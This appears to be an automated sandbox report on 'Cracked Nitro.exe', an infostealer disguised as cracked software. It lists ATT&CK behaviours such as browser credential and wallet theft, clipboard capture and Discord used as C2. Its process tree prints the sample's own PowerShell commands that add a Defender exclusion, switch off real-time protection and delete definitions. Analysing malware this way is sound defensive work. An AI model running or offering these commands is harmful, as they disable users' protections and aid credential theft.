c6a60163ce2f7b9af3da3af8321b3c34913a6dba5059cb57175fef40f80a1749

Analysis

max time kernel
140s
max time network
121s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
26-11-2024 02:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Cracked Nitro.exe
Size

6.0MB
MD5

fc201b8e55fcbbc5528bef5d43458913
SHA1

96912cefc94008e5585c9294e397f51f2d664b9f
SHA256

c6a60163ce2f7b9af3da3af8321b3c34913a6dba5059cb57175fef40f80a1749
SHA512

a4baefc290d3c30d186ffc7fbd62762478e6d552917fe9ff68b6bf416fff5324312da9e0f39ecd6fe94ff3b6e75a462f88789f3b8eccf8c72214b30b1e43eb71
SSDEEP

98304:oKEtdFBBxUamaHl3Ne4i3gmtfXJOLhx9fZAzDJ4wzQgsRuGK4RSPMfk3O8MYTQ:oxFjxVeN/FJMIDJf0gsAGK4RSkfPYTQ

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4804	powershell.exe
1948	powershell.exe
956	powershell.exe
5104	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4984	powershell.exe
2308	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
4840	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
408	Cracked Nitro.exe
408	Cracked Nitro.exe
408	Cracked Nitro.exe
408	Cracked Nitro.exe
408	Cracked Nitro.exe
408	Cracked Nitro.exe
408	Cracked Nitro.exe
408	Cracked Nitro.exe
408	Cracked Nitro.exe
408	Cracked Nitro.exe
408	Cracked Nitro.exe
408	Cracked Nitro.exe
408	Cracked Nitro.exe
408	Cracked Nitro.exe
408	Cracked Nitro.exe
408	Cracked Nitro.exe
408	Cracked Nitro.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Drops desktop.ini file(s) 7 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Videos\desktop.ini	wmplayer.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	wmplayer.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	wmplayer.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	wmplayer.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	wmplayer.exe
File opened for modification	C:\Users\Public\desktop.ini	wmplayer.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	wmplayer.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\R:	wmplayer.exe
File opened (read-only)	\??\W:	wmplayer.exe
File opened (read-only)	\??\A:	unregmp2.exe
File opened (read-only)	\??\T:	unregmp2.exe
File opened (read-only)	\??\V:	unregmp2.exe
File opened (read-only)	\??\E:	wmplayer.exe
File opened (read-only)	\??\K:	wmplayer.exe
File opened (read-only)	\??\Q:	wmplayer.exe
File opened (read-only)	\??\X:	wmplayer.exe
File opened (read-only)	\??\O:	unregmp2.exe
File opened (read-only)	\??\P:	unregmp2.exe
File opened (read-only)	\??\P:	wmplayer.exe
File opened (read-only)	\??\M:	unregmp2.exe
File opened (read-only)	\??\U:	unregmp2.exe
File opened (read-only)	\??\A:	wmplayer.exe
File opened (read-only)	\??\J:	wmplayer.exe
File opened (read-only)	\??\U:	wmplayer.exe
File opened (read-only)	\??\G:	unregmp2.exe
File opened (read-only)	\??\I:	unregmp2.exe
File opened (read-only)	\??\J:	unregmp2.exe
File opened (read-only)	\??\T:	wmplayer.exe
File opened (read-only)	\??\B:	unregmp2.exe
File opened (read-only)	\??\H:	unregmp2.exe
File opened (read-only)	\??\Q:	unregmp2.exe
File opened (read-only)	\??\M:	wmplayer.exe
File opened (read-only)	\??\V:	wmplayer.exe
File opened (read-only)	\??\Z:	wmplayer.exe
File opened (read-only)	\??\N:	unregmp2.exe
File opened (read-only)	\??\R:	unregmp2.exe
File opened (read-only)	\??\W:	unregmp2.exe
File opened (read-only)	\??\G:	wmplayer.exe
File opened (read-only)	\??\I:	wmplayer.exe
File opened (read-only)	\??\Y:	wmplayer.exe
File opened (read-only)	\??\H:	wmplayer.exe
File opened (read-only)	\??\L:	wmplayer.exe
File opened (read-only)	\??\E:	unregmp2.exe
File opened (read-only)	\??\K:	unregmp2.exe
File opened (read-only)	\??\L:	unregmp2.exe
File opened (read-only)	\??\X:	unregmp2.exe
File opened (read-only)	\??\Y:	unregmp2.exe
File opened (read-only)	\??\Z:	unregmp2.exe
File opened (read-only)	\??\N:	wmplayer.exe
File opened (read-only)	\??\S:	wmplayer.exe
File opened (read-only)	\??\S:	unregmp2.exe
File opened (read-only)	\??\B:	wmplayer.exe
File opened (read-only)	\??\O:	wmplayer.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
1	discord.com
5	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
480	tasklist.exe
4604	tasklist.exe
4668	tasklist.exe
532	tasklist.exe

UPX packed file 60 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x001900000002aada-21.dat	upx
behavioral1/memory/408-25-0x00007FFE8FD60000-0x00007FFE901CE000-memory.dmp	upx
behavioral1/files/0x001900000002aaca-27.dat	upx
behavioral1/memory/408-30-0x00007FFE98890000-0x00007FFE988B4000-memory.dmp	upx
behavioral1/files/0x001c00000002aad8-29.dat	upx
behavioral1/memory/408-32-0x00007FFE9DE70000-0x00007FFE9DE7F000-memory.dmp	upx
behavioral1/files/0x001900000002aacf-46.dat	upx
behavioral1/files/0x001900000002aad1-48.dat	upx
behavioral1/files/0x001900000002aad0-47.dat	upx
behavioral1/files/0x001900000002aace-45.dat	upx
behavioral1/files/0x001900000002aacd-44.dat	upx
behavioral1/files/0x001900000002aacb-42.dat	upx
behavioral1/files/0x001900000002aae0-39.dat	upx
behavioral1/files/0x001900000002aad9-35.dat	upx
behavioral1/files/0x001900000002aacc-43.dat	upx
behavioral1/files/0x001a00000002aac9-41.dat	upx
behavioral1/files/0x001900000002aae3-40.dat	upx
behavioral1/files/0x001900000002aadf-38.dat	upx
behavioral1/files/0x001900000002aad7-34.dat	upx
behavioral1/memory/408-54-0x00007FFE987F0000-0x00007FFE9881D000-memory.dmp	upx
behavioral1/memory/408-57-0x00007FFE99E90000-0x00007FFE99EA9000-memory.dmp	upx
behavioral1/memory/408-58-0x00007FFE99C70000-0x00007FFE99C8F000-memory.dmp	upx
behavioral1/memory/408-60-0x00007FFE82E80000-0x00007FFE82FF1000-memory.dmp	upx
behavioral1/memory/408-62-0x00007FFE98870000-0x00007FFE98889000-memory.dmp	upx
behavioral1/memory/408-64-0x00007FFE97890000-0x00007FFE9789D000-memory.dmp	upx
behavioral1/memory/408-66-0x00007FFE97860000-0x00007FFE9788E000-memory.dmp	upx
behavioral1/memory/408-74-0x00007FFE98890000-0x00007FFE988B4000-memory.dmp	upx
behavioral1/memory/408-73-0x00007FFE82930000-0x00007FFE82CA5000-memory.dmp	upx
behavioral1/memory/408-71-0x00007FFE8FCA0000-0x00007FFE8FD58000-memory.dmp	upx
behavioral1/memory/408-70-0x00007FFE8FD60000-0x00007FFE901CE000-memory.dmp	upx
behavioral1/memory/408-78-0x00007FFE97810000-0x00007FFE9781D000-memory.dmp	upx
behavioral1/memory/408-77-0x00007FFE976F0000-0x00007FFE97704000-memory.dmp	upx
behavioral1/memory/408-80-0x00007FFE82810000-0x00007FFE82928000-memory.dmp	upx
behavioral1/memory/408-104-0x00007FFE99C70000-0x00007FFE99C8F000-memory.dmp	upx
behavioral1/memory/408-105-0x00007FFE82E80000-0x00007FFE82FF1000-memory.dmp	upx
behavioral1/memory/408-164-0x00007FFE98870000-0x00007FFE98889000-memory.dmp	upx
behavioral1/memory/408-189-0x00007FFE97890000-0x00007FFE9789D000-memory.dmp	upx
behavioral1/memory/408-234-0x00007FFE97860000-0x00007FFE9788E000-memory.dmp	upx
behavioral1/memory/408-253-0x00007FFE8FCA0000-0x00007FFE8FD58000-memory.dmp	upx
behavioral1/memory/408-263-0x00007FFE82930000-0x00007FFE82CA5000-memory.dmp	upx
behavioral1/memory/408-266-0x00007FFE8FD60000-0x00007FFE901CE000-memory.dmp	upx
behavioral1/memory/408-272-0x00007FFE82E80000-0x00007FFE82FF1000-memory.dmp	upx
behavioral1/memory/408-271-0x00007FFE99C70000-0x00007FFE99C8F000-memory.dmp	upx
behavioral1/memory/408-267-0x00007FFE98890000-0x00007FFE988B4000-memory.dmp	upx
behavioral1/memory/408-299-0x00007FFE8FD60000-0x00007FFE901CE000-memory.dmp	upx
behavioral1/memory/408-2351-0x00007FFE82930000-0x00007FFE82CA5000-memory.dmp	upx
behavioral1/memory/408-2352-0x00007FFE98890000-0x00007FFE988B4000-memory.dmp	upx
behavioral1/memory/408-2362-0x00007FFE97810000-0x00007FFE9781D000-memory.dmp	upx
behavioral1/memory/408-2365-0x00007FFE82810000-0x00007FFE82928000-memory.dmp	upx
behavioral1/memory/408-2364-0x00007FFE976F0000-0x00007FFE97704000-memory.dmp	upx
behavioral1/memory/408-2363-0x00007FFE8FD60000-0x00007FFE901CE000-memory.dmp	upx
behavioral1/memory/408-2361-0x00007FFE8FCA0000-0x00007FFE8FD58000-memory.dmp	upx
behavioral1/memory/408-2360-0x00007FFE97860000-0x00007FFE9788E000-memory.dmp	upx
behavioral1/memory/408-2359-0x00007FFE97890000-0x00007FFE9789D000-memory.dmp	upx
behavioral1/memory/408-2358-0x00007FFE98870000-0x00007FFE98889000-memory.dmp	upx
behavioral1/memory/408-2357-0x00007FFE82E80000-0x00007FFE82FF1000-memory.dmp	upx
behavioral1/memory/408-2356-0x00007FFE99E90000-0x00007FFE99EA9000-memory.dmp	upx
behavioral1/memory/408-2355-0x00007FFE99C70000-0x00007FFE99C8F000-memory.dmp	upx
behavioral1/memory/408-2354-0x00007FFE987F0000-0x00007FFE9881D000-memory.dmp	upx
behavioral1/memory/408-2353-0x00007FFE9DE70000-0x00007FFE9DE7F000-memory.dmp	upx

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host\upnphost\udhisapi.dll	svchost.exe
File opened for modification	C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host\upnphost\udhisapi.dll	svchost.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmplayer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	unregmp2.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4736	cmd.exe
684	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3124	WMIC.exe
4808	WMIC.exe
3916	WMIC.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4120	systeminfo.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133770635644479853"	chrome.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-wmplayer	wmplayer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-wmplayer\CLSID = "{cd3afa96-b84f-48f0-9393-7edc34128127}"	wmplayer.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
956	powershell.exe
4804	powershell.exe
956	powershell.exe
4804	powershell.exe
4984	powershell.exe
4984	powershell.exe
4456	powershell.exe
4456	powershell.exe
4984	powershell.exe
4456	powershell.exe
5104	powershell.exe
5104	powershell.exe
1580	powershell.exe
1580	powershell.exe
1948	powershell.exe
1948	powershell.exe
4668	powershell.exe
4668	powershell.exe
3144	chrome.exe
3144	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

pid	Process
3144	chrome.exe
3144	chrome.exe
3144	chrome.exe
3144	chrome.exe
3144	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	480	tasklist.exe
Token: SeIncreaseQuotaPrivilege	2148	WMIC.exe
Token: SeSecurityPrivilege	2148	WMIC.exe
Token: SeTakeOwnershipPrivilege	2148	WMIC.exe
Token: SeLoadDriverPrivilege	2148	WMIC.exe
Token: SeSystemProfilePrivilege	2148	WMIC.exe
Token: SeSystemtimePrivilege	2148	WMIC.exe
Token: SeProfSingleProcessPrivilege	2148	WMIC.exe
Token: SeIncBasePriorityPrivilege	2148	WMIC.exe
Token: SeCreatePagefilePrivilege	2148	WMIC.exe
Token: SeBackupPrivilege	2148	WMIC.exe
Token: SeRestorePrivilege	2148	WMIC.exe
Token: SeShutdownPrivilege	2148	WMIC.exe
Token: SeDebugPrivilege	2148	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2148	WMIC.exe
Token: SeRemoteShutdownPrivilege	2148	WMIC.exe
Token: SeUndockPrivilege	2148	WMIC.exe
Token: SeManageVolumePrivilege	2148	WMIC.exe
Token: 33	2148	WMIC.exe
Token: 34	2148	WMIC.exe
Token: 35	2148	WMIC.exe
Token: 36	2148	WMIC.exe
Token: SeDebugPrivilege	956	powershell.exe
Token: SeIncreaseQuotaPrivilege	2148	WMIC.exe
Token: SeSecurityPrivilege	2148	WMIC.exe
Token: SeTakeOwnershipPrivilege	2148	WMIC.exe
Token: SeLoadDriverPrivilege	2148	WMIC.exe
Token: SeSystemProfilePrivilege	2148	WMIC.exe
Token: SeSystemtimePrivilege	2148	WMIC.exe
Token: SeProfSingleProcessPrivilege	2148	WMIC.exe
Token: SeIncBasePriorityPrivilege	2148	WMIC.exe
Token: SeCreatePagefilePrivilege	2148	WMIC.exe
Token: SeBackupPrivilege	2148	WMIC.exe
Token: SeRestorePrivilege	2148	WMIC.exe
Token: SeShutdownPrivilege	2148	WMIC.exe
Token: SeDebugPrivilege	2148	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2148	WMIC.exe
Token: SeRemoteShutdownPrivilege	2148	WMIC.exe
Token: SeUndockPrivilege	2148	WMIC.exe
Token: SeManageVolumePrivilege	2148	WMIC.exe
Token: 33	2148	WMIC.exe
Token: 34	2148	WMIC.exe
Token: 35	2148	WMIC.exe
Token: 36	2148	WMIC.exe
Token: SeDebugPrivilege	4804	powershell.exe
Token: SeIncreaseQuotaPrivilege	3124	WMIC.exe
Token: SeSecurityPrivilege	3124	WMIC.exe
Token: SeTakeOwnershipPrivilege	3124	WMIC.exe
Token: SeLoadDriverPrivilege	3124	WMIC.exe
Token: SeSystemProfilePrivilege	3124	WMIC.exe
Token: SeSystemtimePrivilege	3124	WMIC.exe
Token: SeProfSingleProcessPrivilege	3124	WMIC.exe
Token: SeIncBasePriorityPrivilege	3124	WMIC.exe
Token: SeCreatePagefilePrivilege	3124	WMIC.exe
Token: SeBackupPrivilege	3124	WMIC.exe
Token: SeRestorePrivilege	3124	WMIC.exe
Token: SeShutdownPrivilege	3124	WMIC.exe
Token: SeDebugPrivilege	3124	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3124	WMIC.exe
Token: SeRemoteShutdownPrivilege	3124	WMIC.exe
Token: SeUndockPrivilege	3124	WMIC.exe
Token: SeManageVolumePrivilege	3124	WMIC.exe
Token: 33	3124	WMIC.exe
Token: 34	3124	WMIC.exe

Suspicious use of FindShellTrayWindow 28 IoCs

pid	Process
3356	wmplayer.exe
3144	chrome.exe
3144	chrome.exe
3144	chrome.exe
3144	chrome.exe
3144	chrome.exe
3144	chrome.exe
3144	chrome.exe
3144	chrome.exe
3144	chrome.exe
3144	chrome.exe
3144	chrome.exe
3144	chrome.exe
3144	chrome.exe
3144	chrome.exe
3144	chrome.exe
3144	chrome.exe
3144	chrome.exe
3144	chrome.exe
3144	chrome.exe
3144	chrome.exe
3144	chrome.exe
3144	chrome.exe
3144	chrome.exe
3144	chrome.exe
3144	chrome.exe
3144	chrome.exe
3144	chrome.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
3144	chrome.exe
3144	chrome.exe
3144	chrome.exe
3144	chrome.exe
3144	chrome.exe
3144	chrome.exe
3144	chrome.exe
3144	chrome.exe
3144	chrome.exe
3144	chrome.exe
3144	chrome.exe
3144	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3500 wrote to memory of 408	3500	Cracked Nitro.exe	79
PID 3500 wrote to memory of 408	3500	Cracked Nitro.exe	79
PID 408 wrote to memory of 104	408	Cracked Nitro.exe	81
PID 408 wrote to memory of 104	408	Cracked Nitro.exe	81
PID 408 wrote to memory of 1808	408	Cracked Nitro.exe	82
PID 408 wrote to memory of 1808	408	Cracked Nitro.exe	82
PID 408 wrote to memory of 1200	408	Cracked Nitro.exe	83
PID 408 wrote to memory of 1200	408	Cracked Nitro.exe	83
PID 408 wrote to memory of 2304	408	Cracked Nitro.exe	85
PID 408 wrote to memory of 2304	408	Cracked Nitro.exe	85
PID 408 wrote to memory of 1704	408	Cracked Nitro.exe	89
PID 408 wrote to memory of 1704	408	Cracked Nitro.exe	89
PID 2304 wrote to memory of 480	2304	cmd.exe	91
PID 2304 wrote to memory of 480	2304	cmd.exe	91
PID 1808 wrote to memory of 956	1808	cmd.exe	92
PID 1808 wrote to memory of 956	1808	cmd.exe	92
PID 1200 wrote to memory of 5080	1200	cmd.exe	93
PID 1200 wrote to memory of 5080	1200	cmd.exe	93
PID 104 wrote to memory of 4804	104	cmd.exe	94
PID 104 wrote to memory of 4804	104	cmd.exe	94
PID 1704 wrote to memory of 2148	1704	cmd.exe	95
PID 1704 wrote to memory of 2148	1704	cmd.exe	95
PID 408 wrote to memory of 2692	408	Cracked Nitro.exe	97
PID 408 wrote to memory of 2692	408	Cracked Nitro.exe	97
PID 2692 wrote to memory of 2524	2692	cmd.exe	99
PID 2692 wrote to memory of 2524	2692	cmd.exe	99
PID 408 wrote to memory of 2740	408	Cracked Nitro.exe	100
PID 408 wrote to memory of 2740	408	Cracked Nitro.exe	100
PID 2740 wrote to memory of 3408	2740	cmd.exe	102
PID 2740 wrote to memory of 3408	2740	cmd.exe	102
PID 408 wrote to memory of 3904	408	Cracked Nitro.exe	103
PID 408 wrote to memory of 3904	408	Cracked Nitro.exe	103
PID 3904 wrote to memory of 3124	3904	cmd.exe	105
PID 3904 wrote to memory of 3124	3904	cmd.exe	105
PID 408 wrote to memory of 1788	408	Cracked Nitro.exe	147
PID 408 wrote to memory of 1788	408	Cracked Nitro.exe	147
PID 1788 wrote to memory of 4808	1788	cmd.exe	108
PID 1788 wrote to memory of 4808	1788	cmd.exe	108
PID 408 wrote to memory of 4588	408	Cracked Nitro.exe	109
PID 408 wrote to memory of 4588	408	Cracked Nitro.exe	109
PID 408 wrote to memory of 4572	408	Cracked Nitro.exe	111
PID 408 wrote to memory of 4572	408	Cracked Nitro.exe	111
PID 408 wrote to memory of 4460	408	Cracked Nitro.exe	113
PID 408 wrote to memory of 4460	408	Cracked Nitro.exe	113
PID 408 wrote to memory of 2308	408	Cracked Nitro.exe	114
PID 408 wrote to memory of 2308	408	Cracked Nitro.exe	114
PID 408 wrote to memory of 4704	408	Cracked Nitro.exe	116
PID 408 wrote to memory of 4704	408	Cracked Nitro.exe	116
PID 408 wrote to memory of 2972	408	Cracked Nitro.exe	119
PID 408 wrote to memory of 2972	408	Cracked Nitro.exe	119
PID 408 wrote to memory of 4736	408	Cracked Nitro.exe	120
PID 408 wrote to memory of 4736	408	Cracked Nitro.exe	120
PID 4588 wrote to memory of 4604	4588	cmd.exe	123
PID 4588 wrote to memory of 4604	4588	cmd.exe	123
PID 4572 wrote to memory of 4668	4572	cmd.exe	124
PID 4572 wrote to memory of 4668	4572	cmd.exe	124
PID 408 wrote to memory of 2032	408	Cracked Nitro.exe	125
PID 408 wrote to memory of 2032	408	Cracked Nitro.exe	125
PID 408 wrote to memory of 2708	408	Cracked Nitro.exe	127
PID 408 wrote to memory of 2708	408	Cracked Nitro.exe	127
PID 4704 wrote to memory of 532	4704	cmd.exe	129
PID 4704 wrote to memory of 532	4704	cmd.exe	129
PID 4736 wrote to memory of 684	4736	cmd.exe	130
PID 4736 wrote to memory of 684	4736	cmd.exe	130

C:\Users\Admin\AppData\Local\Temp\Cracked Nitro.exe
"C:\Users\Admin\AppData\Local\Temp\Cracked Nitro.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3500
- C:\Users\Admin\AppData\Local\Temp\Cracked Nitro.exe
  "C:\Users\Admin\AppData\Local\Temp\Cracked Nitro.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Cracked Nitro.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:104
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Cracked Nitro.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1808
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('.gg/easybeams', 0, 'SUCK MY DICK', 48+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1200
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('.gg/easybeams', 0, 'SUCK MY DICK', 48+16);close()"
      4⤵
      PID:5080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2304
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1704
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2692
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:2524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2740
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:3408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3904
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:3124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1788
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4588
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4572
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:4460
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:1580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:2308
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:4984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4704
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2972
